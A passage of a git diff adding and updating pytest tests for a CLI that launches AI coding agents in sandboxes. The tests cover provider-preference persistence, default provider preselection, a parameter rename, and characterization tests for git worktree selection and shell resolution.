deps = _build_dependencies(provider_id=provider_id) + + mocks: dict[str, MagicMock] = {} + for patch_path in _FLOW_BASE_PATCHES: + short_name = patch_path.rsplit(".", 1)[-1] + mocks[short_name] = MagicMock() + + # Wire up return values + mocks["is_setup_needed"].return_value = False + mocks["load_user_config"].return_value = {} + mocks["get_default_adapters"].return_value = _build_adapters() + mocks["validate_and_resolve_workspace"].return_value = tmp_path + mocks["prepare_workspace"].return_value = tmp_path + mocks["resolve_workspace_team"].return_value = None + mocks["resolve_launch_provider"].return_value = (provider_id, "explicit") + mocks["collect_launch_readiness"].return_value = LaunchReadiness( + provider_id=provider_id, + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.PRESENT, + requires_image_bootstrap=False, + requires_auth_bootstrap=False, + launch_ready=True, + ) + mocks["prepare_live_start_plan"].return_value = (deps, plan) + mocks["_apply_personal_profile"].return_value = (None, False) + mocks["resolve_launch_conflict"].return_value = LaunchConflictResolution( + decision=conflict_decision, + plan=plan, + ) + + if finalize_side_effect is not None: + mocks["finalize_launch"].side_effect = finalize_side_effect + + return mocks + + +# ────────────────────────────────────────────────────────────────────────────── +# Tests: workspace preference after successful launch +# ────────────────────────────────────────────────────────────────────────────── + + +class TestSuccessfulLaunchWritesPreference: + """set_workspace_last_used_provider is called after finalize_launch succeeds.""" + + def test_successful_launch_writes_workspace_preference(self, tmp_path: Path) -> None: + mocks = _apply_flow_patches(tmp_path, provider_id="codex") + + with _patch_all(mocks): + _invoke_start(tmp_path, provider="codex") + + mocks["set_workspace_last_used_provider"].assert_called_once_with(tmp_path, "codex") + + def test_successful_launch_calls_preference_after_finalize(self, tmp_path: Path) -> None: + """Verify ordering: finalize_launch is called before set_workspace_last_used_provider.""" + call_order: list[str] = [] + mocks = _apply_flow_patches(tmp_path, provider_id="codex") + mocks["finalize_launch"].side_effect = lambda *a, **kw: call_order.append("finalize") + mocks["set_workspace_last_used_provider"].side_effect = lambda *a, **kw: call_order.append( + "set_pref" + ) + + with _patch_all(mocks): + _invoke_start(tmp_path, provider="codex") + + assert call_order == ["finalize", "set_pref"] + + +# ────────────────────────────────────────────────────────────────────────────── +# Tests: failed launch does NOT write preference +# ────────────────────────────────────────────────────────────────────────────── + + +class TestFailedLaunchDoesNotWritePreference: + """If finalize_launch raises, workspace preference must NOT be persisted.""" + + def test_finalize_launch_raises_skips_preference_write(self, tmp_path: Path) -> None: + mocks = _apply_flow_patches( + tmp_path, + provider_id="codex", + finalize_side_effect=SandboxLaunchError( + user_message="Docker start failed", + suggested_action="Check docker daemon", + ), + ) + + with _patch_all(mocks), pytest.raises(SandboxLaunchError): + _invoke_start(tmp_path, provider="codex") + + mocks["set_workspace_last_used_provider"].assert_not_called() + + def test_finalize_launch_raises_runtime_error_skips_preference(self, tmp_path: Path) -> None: + mocks = _apply_flow_patches( + tmp_path, + provider_id="codex", + finalize_side_effect=RuntimeError("unexpected container failure"), + ) + + with _patch_all(mocks), pytest.raises(RuntimeError): + _invoke_start(tmp_path, provider="codex") + + mocks["set_workspace_last_used_provider"].assert_not_called() + + +# ────────────────────────────────────────────────────────────────────────────── +# Tests: cancelled launch does NOT write preference +# ────────────────────────────────────────────────────────────────────────────── + + +class TestCancelledLaunchDoesNotWritePreference: + """If the user cancels, workspace preference must NOT be persisted.""" + + def test_cancelled_conflict_does_not_write_preference(self, tmp_path: Path) -> None: + mocks = _apply_flow_patches( + tmp_path, + provider_id="codex", + conflict_decision=LaunchConflictDecision.CANCELLED, + ) + + import typer + + with _patch_all(mocks), pytest.raises(typer.Exit): + _invoke_start(tmp_path, provider="codex") + + mocks["set_workspace_last_used_provider"].assert_not_called() + mocks["finalize_launch"].assert_not_called() + + +# ────────────────────────────────────────────────────────────────────────────── +# Tests: KEEP_EXISTING writes preference +# ────────────────────────────────────────────────────────────────────────────── + + +class TestKeepExistingWritesPreference: + """KEEP_EXISTING conflict resolution writes workspace preference (without launching).""" + + def test_keep_existing_writes_preference_via_flow_start(self, tmp_path: Path) -> None: + mocks = _apply_flow_patches( + tmp_path, + provider_id="codex", + conflict_decision=LaunchConflictDecision.KEEP_EXISTING, + ) + + import typer + + with _patch_all(mocks), pytest.raises(typer.Exit) as exc_info: + _invoke_start(tmp_path, provider="codex") + + assert exc_info.value.exit_code == 0 + mocks["set_workspace_last_used_provider"].assert_called_once_with(tmp_path, "codex") + # finalize_launch should NOT be called for KEEP_EXISTING + mocks["finalize_launch"].assert_not_called() + + def test_keep_existing_does_not_call_finalize_launch(self, tmp_path: Path) -> None: + mocks = _apply_flow_patches( + tmp_path, + provider_id="claude", + conflict_decision=LaunchConflictDecision.KEEP_EXISTING, + ) + + import typer + + with _patch_all(mocks), pytest.raises(typer.Exit): + _invoke_start(tmp_path, provider="claude") + + mocks["finalize_launch"].assert_not_called() + mocks["set_workspace_last_used_provider"].assert_called_once_with(tmp_path, "claude") + + +# ────────────────────────────────────────────────────────────────────────────── +# Tests: _resolve_prompt_default preselection logic +# ────────────────────────────────────────────────────────────────────────────── + + +class TestResolvePromptDefault: + """_resolve_prompt_default returns correct preselection for ask+last-used scenarios.""" + + def test_workspace_last_used_preselected_when_connected(self) -> None: + """ask + workspace_last_used='codex' + codex connected → codex preselected.""" + result = _resolve_prompt_default( + candidates=("claude", "codex"), + connected_allowed=("claude", "codex"), + workspace_last_used="codex", + config_provider="ask", + ) + assert result == "codex" + + def test_workspace_last_used_not_preselected_when_disconnected(self) -> None: + """ask + workspace_last_used='codex' + codex NOT connected → no preselection.""" + result = _resolve_prompt_default( + candidates=("claude", "codex"), + connected_allowed=("claude",), + workspace_last_used="codex", + config_provider="ask", + ) + assert result is None + + def test_no_workspace_last_used_no_preselection(self) -> None: + """ask + no workspace_last_used → no preselection.""" + result = _resolve_prompt_default( + candidates=("claude", "codex"), + connected_allowed=("claude", "codex"), + workspace_last_used=None, + config_provider="ask", + ) + assert result is None + + def test_config_provider_preselected_when_no_workspace_last_used(self) -> None: + """No workspace_last_used but config_provider set and connected → config preselected.""" + result = _resolve_prompt_default( + candidates=("claude", "codex"), + connected_allowed=("claude", "codex"), + workspace_last_used=None, + config_provider="claude", + ) + assert result == "claude" + + def test_workspace_last_used_beats_config_provider(self) -> None: + """workspace_last_used takes precedence over config_provider.""" + result = _resolve_prompt_default( + candidates=("claude", "codex"), + connected_allowed=("claude", "codex"), + workspace_last_used="codex", + config_provider="claude", + ) + assert result == "codex" + + def test_workspace_last_used_not_in_candidates_returns_none(self) -> None: + """workspace_last_used not in candidates → falls through.""" + result = _resolve_prompt_default( + candidates=("claude",), + connected_allowed=("claude",), + workspace_last_used="codex", + config_provider=None, + ) + assert result is None + + +# ────────────────────────────────────────────────────────────────────────────── +# Tests: ask preference triggers prompt with correct preselection +# ────────────────────────────────────────────────────────────────────────────── + + +class TestAskPreferencePromptPreselection: + """When global preference is 'ask', the chooser prompt receives the right default.""" + + def test_ask_with_workspace_last_used_passes_preselection_to_prompt(self) -> None: + """ask + workspace_last_used='codex' → prompt receives default='codex'.""" + from scc_cli.commands.launch.provider_choice import choose_start_provider + + prompt = MagicMock(return_value="codex") + + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + config_provider="ask", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result == "codex" + prompt.assert_called_once() + # Third arg to prompt_choice is the default — should be "codex" + _, _, default_arg = prompt.call_args[0] + assert default_arg == "codex" + + def test_ask_with_disconnected_workspace_last_used_auto_selects_single(self) -> None: + """ask + workspace_last_used='codex' but only claude connected → auto-selects claude. + + When only one provider is connected, the auto-single logic kicks in + before the prompt is reached — no prompt needed. + """ + from scc_cli.commands.launch.provider_choice import choose_start_provider + + prompt = MagicMock(return_value="claude") + + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + config_provider="ask", + connected_provider_ids=("claude",), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result == "claude" + # Single connected provider auto-selects without prompting + prompt.assert_not_called() + + def test_ask_with_disconnected_workspace_last_used_prompts_with_none_default(self) -> None: + """ask + workspace_last_used not connected + multiple connected → default=None. + + When workspace_last_used references a provider that isn't connected, + and multiple other providers are connected, the prompt default is None. + """ + from scc_cli.commands.launch.provider_choice import choose_start_provider + + prompt = MagicMock(return_value="claude") + + # workspace_last_used="gemini" but gemini isn't in connected_provider_ids + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="gemini", + config_provider="ask", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result == "claude" + prompt.assert_called_once() + _, _, default_arg = prompt.call_args[0] + assert default_arg is None + + def test_ask_without_workspace_last_used_has_no_preselection(self) -> None: + """ask + no workspace_last_used → default=None.""" + from scc_cli.commands.launch.provider_choice import choose_start_provider + + prompt = MagicMock(return_value="claude") + + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider="ask", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result == "claude" + prompt.assert_called_once() + _, _, default_arg = prompt.call_args[0] + assert default_arg is None + + +# ────────────────────────────────────────────────────────────────────────────── +# Helper: apply all flow patches as a context manager +# ────────────────────────────────────────────────────────────────────────────── + + +class _PatchAll: + """Context manager that applies all flow base patches from a mocks dict.""" + + def __init__(self, mocks: dict[str, MagicMock]) -> None: + self._mocks = mocks + self._patchers: list[patch] = [] # type: ignore[type-arg] + + def __enter__(self) -> dict[str, MagicMock]: + for patch_path in _FLOW_BASE_PATCHES: + short_name = patch_path.rsplit(".", 1)[-1] + p = patch(patch_path, self._mocks[short_name]) + p.start() + self._patchers.append(p) + return self._mocks + + def __exit__(self, *args: object) -> None: + for p in reversed(self._patchers): + p.stop() + + +def _patch_all(mocks: dict[str, MagicMock]) -> _PatchAll: + return _PatchAll(mocks) diff --git a/tests/test_worktree_cli.py b/tests/test_worktree_cli.py index 8bfa3e3..7d4d5a7 100644 --- a/tests/test_worktree_cli.py +++ b/tests/test_worktree_cli.py @@ -123,7 +123,7 @@ def test_create_calls_ui_create_worktree( workspace=str(tmp_path), name="feature", base_branch=None, - start_claude=False, + start_agent=False, install_deps=False, ) except click.exceptions.Exit: @@ -158,7 +158,7 @@ def test_create_with_base_branch(self, tmp_path: Path, worktree_command_dependen workspace=str(tmp_path), name="feature", base_branch="develop", - start_claude=False, + start_agent=False, install_deps=False, ) except click.exceptions.Exit: @@ -183,7 +183,7 @@ def test_create_raises_for_non_repo( workspace=str(tmp_path), name="feature", base_branch=None, - start_claude=False, + start_agent=False, install_deps=False, ) assert exc_info.value.exit_code == 4 @@ -1337,7 +1337,7 @@ def test_non_git_repo_interactive_accepts_init( dependencies_installed=True, ) try: - worktree_create_cmd(workspace=str(tmp_path), name="feature-x", start_claude=False) + worktree_create_cmd(workspace=str(tmp_path), name="feature-x", start_agent=False) except (click.exceptions.Exit, SystemExit): pass # May exit after creation diff --git a/tests/test_worktree_use_cases_characterization.py b/tests/test_worktree_use_cases_characterization.py new file mode 100644 index 0000000..1850582 --- /dev/null +++ b/tests/test_worktree_use_cases_characterization.py @@ -0,0 +1,375 @@ +"""Characterization tests for application/worktree/use_cases.py. + +Lock the current behavior of pure domain logic — selection item building, +shell command resolution, summary construction, and request-to-outcome +routing — before S02 surgery begins. +""" + +from __future__ import annotations + +from pathlib import Path +from unittest.mock import MagicMock + +from scc_cli.application.worktree.use_cases import ( + WorktreeConfirmAction, + WorktreeConfirmation, + WorktreeDependencies, + WorktreeEnterRequest, + WorktreeListRequest, + WorktreeResolution, + WorktreeSelectionItem, + WorktreeSelectionPrompt, + WorktreeSelectRequest, + WorktreeShellResult, + WorktreeSummary, + WorktreeWarningOutcome, + _build_selection_items, + _build_shell_result, + list_worktrees, + select_worktree, +) +from scc_cli.core.exit_codes import EXIT_CANCELLED +from scc_cli.services.git.worktree import WorktreeInfo + +# ═══════════════════════════════════════════════════════════════════════════════ +# WorktreeSummary.from_info +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestWorktreeSummaryFromInfo: + """WorktreeSummary.from_info factory method.""" + + def test_basic_construction(self) -> None: + info = WorktreeInfo( + path="/tmp/test-wt", + branch="feature/foo", + status="clean", + is_current=False, + has_changes=False, + staged_count=0, + modified_count=0, + untracked_count=0, + status_timed_out=False, + ) + summary = WorktreeSummary.from_info( + info, + path=Path("/tmp/test-wt"), + is_current=True, + staged_count=2, + modified_count=1, + untracked_count=3, + status_timed_out=False, + has_changes=True, + ) + assert summary.path == Path("/tmp/test-wt") + assert summary.branch == "feature/foo" + assert summary.is_current is True + assert summary.staged_count == 2 + assert summary.modified_count == 1 + assert summary.untracked_count == 3 + assert summary.has_changes is True + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _build_selection_items +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildSelectionItems: + """Selection item assembly from worktrees and branches.""" + + def _make_summary(self, path: str, branch: str) -> WorktreeSummary: + return WorktreeSummary( + path=Path(path), + branch=branch, + status="clean", + is_current=False, + has_changes=False, + staged_count=0, + modified_count=0, + untracked_count=0, + status_timed_out=False, + ) + + def test_worktrees_only(self) -> None: + summaries = [self._make_summary("/tmp/wt1", "main")] + items = _build_selection_items(summaries, []) + assert len(items) == 1 + assert items[0].is_branch_only is False + assert items[0].item_id == "worktree:/tmp/wt1" + + def test_branches_only(self) -> None: + items = _build_selection_items([], ["feature/x", "feature/y"]) + assert len(items) == 2 + assert all(i.is_branch_only for i in items) + assert items[0].item_id == "branch:feature/x" + + def test_mixed_worktrees_and_branches(self) -> None: + summaries = [self._make_summary("/tmp/wt1", "main")] + items = _build_selection_items(summaries, ["feature/x"]) + assert len(items) == 2 + assert items[0].is_branch_only is False + assert items[1].is_branch_only is True + + def test_empty_inputs(self) -> None: + items = _build_selection_items([], []) + assert items == [] + + +# ═══════════════════════════════════════════════════════════════════════════════ +# _build_shell_result +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildShellResult: + """Shell resolution for worktree entry.""" + + def _make_selection(self, path: str, branch: str) -> WorktreeSelectionItem: + return WorktreeSelectionItem( + item_id=f"worktree:{path}", + branch=branch, + worktree=WorktreeSummary( + path=Path(path), + branch=branch, + status="clean", + is_current=False, + has_changes=False, + staged_count=0, + modified_count=0, + untracked_count=0, + status_timed_out=False, + ), + is_branch_only=False, + ) + + def test_linux_shell_resolution(self, tmp_path: Path) -> None: + wt_path = tmp_path / "my-wt" + wt_path.mkdir() + selection = self._make_selection(str(wt_path), "feature/x") + request = WorktreeEnterRequest( + workspace_path=tmp_path, + target=None, + oldpwd=None, + interactive_allowed=True, + current_dir=tmp_path, + env={"SHELL": "/bin/zsh"}, + platform_system="Linux", + ) + result = _build_shell_result(request, selection) + assert isinstance(result, WorktreeShellResult) + assert result.shell_command.argv == ["/bin/zsh"] + assert result.shell_command.workdir == wt_path + assert result.shell_command.env["SCC_WORKTREE"] == "feature/x" + + def test_windows_shell_resolution(self, tmp_path: Path) -> None: + wt_path = tmp_path / "my-wt" + wt_path.mkdir() + selection = self._make_selection(str(wt_path), "feature/x") + request = WorktreeEnterRequest( + workspace_path=tmp_path, + target=None, + oldpwd=None, + interactive_allowed=True, + current_dir=tmp_path, + env={"COMSPEC": "C:\\Windows\\cmd.exe"}, + platform_system="Windows", + ) + result = _build_shell_result(request, selection) + assert isinstance(result, WorktreeShellResult) + assert result.shell_command.argv == ["C:\\Windows\\cmd.exe"] + + def test_missing_worktree_path(self, tmp_path: Path) -> None: + # Path that doesn't exist + missing_path = str(tmp_path / "nonexistent") + selection = self._make_selection(missing_path, "feature/gone") + request = WorktreeEnterRequest( + workspace_path=tmp_path, + target=None, + oldpwd=None, + interactive_allowed=True, + current_dir=tmp_path, + env={}, + platform_system="Linux", + ) + result = _build_shell_result(request, selection) + assert isinstance(result, WorktreeWarningOutcome) + assert "missing" in result.warning.title.lower() + + +# ═══════════════════════════════════════════════════════════════════════════════ +# list_worktrees +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestListWorktrees: + """Worktree listing via git client.""" + + def _make_git_client(self, worktrees: list[WorktreeInfo]) -> MagicMock: + client = MagicMock() + client.list_worktrees.return_value = worktrees + client.get_worktree_status.return_value = (0, 0, 0, False) + return client + + def test_empty_repo(self, tmp_path: Path) -> None: + client = self._make_git_client([]) + request = WorktreeListRequest(workspace_path=tmp_path, verbose=False, current_dir=tmp_path) + result = list_worktrees(request, git_client=client) + assert result.worktrees == () + + def test_single_worktree(self, tmp_path: Path) -> None: + info = WorktreeInfo( + path=str(tmp_path), + branch="main", + status="clean", + is_current=True, + has_changes=False, + staged_count=0, + modified_count=0, + untracked_count=0, + status_timed_out=False, + ) + client = self._make_git_client([info]) + request = WorktreeListRequest(workspace_path=tmp_path, verbose=False, current_dir=tmp_path) + result = list_worktrees(request, git_client=client) + assert len(result.worktrees) == 1 + assert result.worktrees[0].branch == "main" + + def test_verbose_queries_status(self, tmp_path: Path) -> None: + info = WorktreeInfo( + path=str(tmp_path), + branch="main", + status="clean", + is_current=True, + has_changes=False, + staged_count=0, + modified_count=0, + untracked_count=0, + status_timed_out=False, + ) + client = self._make_git_client([info]) + client.get_worktree_status.return_value = (3, 2, 1, False) + request = WorktreeListRequest(workspace_path=tmp_path, verbose=True, current_dir=tmp_path) + result = list_worktrees(request, git_client=client) + wt = result.worktrees[0] + assert wt.staged_count == 3 + assert wt.modified_count == 2 + assert wt.untracked_count == 1 + assert wt.has_changes is True + + +# ═══════════════════════════════════════════════════════════════════════════════ +# select_worktree — resolution paths +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestSelectWorktreeResolution: + """Selection resolution outcomes: resolve, confirm, cancel.""" + + def _make_deps(self) -> WorktreeDependencies: + git = MagicMock() + git.is_git_repo.return_value = True + git.list_worktrees.return_value = [] + git.list_branches_without_worktrees.return_value = [] + installer = MagicMock() + return WorktreeDependencies(git_client=git, dependency_installer=installer) + + def test_worktree_selection_resolves_directly(self, tmp_path: Path) -> None: + deps = self._make_deps() + selection = WorktreeSelectionItem( + item_id="worktree:/tmp/wt", + branch="main", + worktree=WorktreeSummary( + path=tmp_path, + branch="main", + status="clean", + is_current=False, + has_changes=False, + staged_count=0, + modified_count=0, + untracked_count=0, + status_timed_out=False, + ), + is_branch_only=False, + ) + request = WorktreeSelectRequest( + workspace_path=tmp_path, + include_branches=False, + current_dir=tmp_path, + selection=selection, + ) + result = select_worktree(request, dependencies=deps) + assert isinstance(result, WorktreeResolution) + assert result.worktree_path == tmp_path + + def test_branch_selection_prompts_confirmation(self, tmp_path: Path) -> None: + deps = self._make_deps() + selection = WorktreeSelectionItem( + item_id="branch:feature/x", + branch="feature/x", + worktree=None, + is_branch_only=True, + ) + request = WorktreeSelectRequest( + workspace_path=tmp_path, + include_branches=True, + current_dir=tmp_path, + selection=selection, + confirm_create=None, # No confirmation yet + ) + result = select_worktree(request, dependencies=deps) + assert isinstance(result, WorktreeConfirmation) + assert result.action == WorktreeConfirmAction.CREATE_WORKTREE + assert result.branch_name == "feature/x" + + def test_branch_selection_cancelled(self, tmp_path: Path) -> None: + deps = self._make_deps() + selection = WorktreeSelectionItem( + item_id="branch:feature/x", + branch="feature/x", + worktree=None, + is_branch_only=True, + ) + request = WorktreeSelectRequest( + workspace_path=tmp_path, + include_branches=True, + current_dir=tmp_path, + selection=selection, + confirm_create=False, + ) + result = select_worktree(request, dependencies=deps) + assert isinstance(result, WorktreeWarningOutcome) + assert result.exit_code == EXIT_CANCELLED + + def test_no_selection_shows_prompt(self, tmp_path: Path) -> None: + deps = self._make_deps() + deps.git_client.list_worktrees.return_value = [ + WorktreeInfo( + path=str(tmp_path), + branch="main", + status="clean", + is_current=True, + has_changes=False, + staged_count=0, + modified_count=0, + untracked_count=0, + status_timed_out=False, + ) + ] + request = WorktreeSelectRequest( + workspace_path=tmp_path, + include_branches=False, + current_dir=tmp_path, + ) + result = select_worktree(request, dependencies=deps) + assert isinstance(result, WorktreeSelectionPrompt) + + def test_empty_repo_warning(self, tmp_path: Path) -> None: + deps = self._make_deps() + request = WorktreeSelectRequest( + workspace_path=tmp_path, + include_branches=True, + current_dir=tmp_path, + ) + result = select_worktree(request, dependencies=deps) + assert isinstance(result, WorktreeWarningOutcome) + assert "no worktrees" in result.warning.title.lower()